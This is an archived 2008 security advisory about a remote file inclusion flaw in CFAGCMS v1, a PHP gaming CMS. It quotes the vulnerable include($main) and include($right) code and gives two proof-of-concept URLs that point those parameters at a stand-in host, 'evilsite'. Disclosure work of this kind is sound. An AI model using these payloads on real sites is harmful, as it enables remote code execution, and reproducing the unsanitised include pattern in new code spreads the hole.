CFAGCMS v1 Remote File Inclusion Vulnerabilities

2008-12-14 06:00:14

########################## www.BugReport.ir ########################### AmnPardaz Security Research Team## Title: CFAGCMS Remote File Inclusion# Vendor: http://sourceforge.net/projects/cfagcms/# Bug: Remote File Inclusion# Vulnerable Version: 1# Exploitation: Remote with browser# Fix: N/A# Original Advisory: http://www.bugreport.ir/index_58.htm#######################################################################################- Description:####################CFAGCMS is a gaming cms for gaming website like GameSpot, GameSpy and others. It's using php and mysql.####################- Vulnerability:####################+--> File InclusionWhen register_globals is enabled, Its possible to include arbitrary files from local or remote resources.####################- Code Snippet:####################themes/default/index.php #line:14-17 <div id="twocols" class="clearfix"> <div id="maincol" >maincol<?php include($main);?></div> <div id="rightcol" >right col<?php include($right);?></div> </div>####################- Exploits/POCs:####################POC: http://[URL]/cfagcms/themes/default/index.php?main=http://evilsitePOC: http://[URL]/cfagcms/themes/default/index.php?right=http://evilsite####################- Credit :####################AmnPardaz Security Research & Penetration Testing GroupContact: admin[4t}bugreport{d0t]irwww.BugReport.irwww.AmnPardaz.com#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.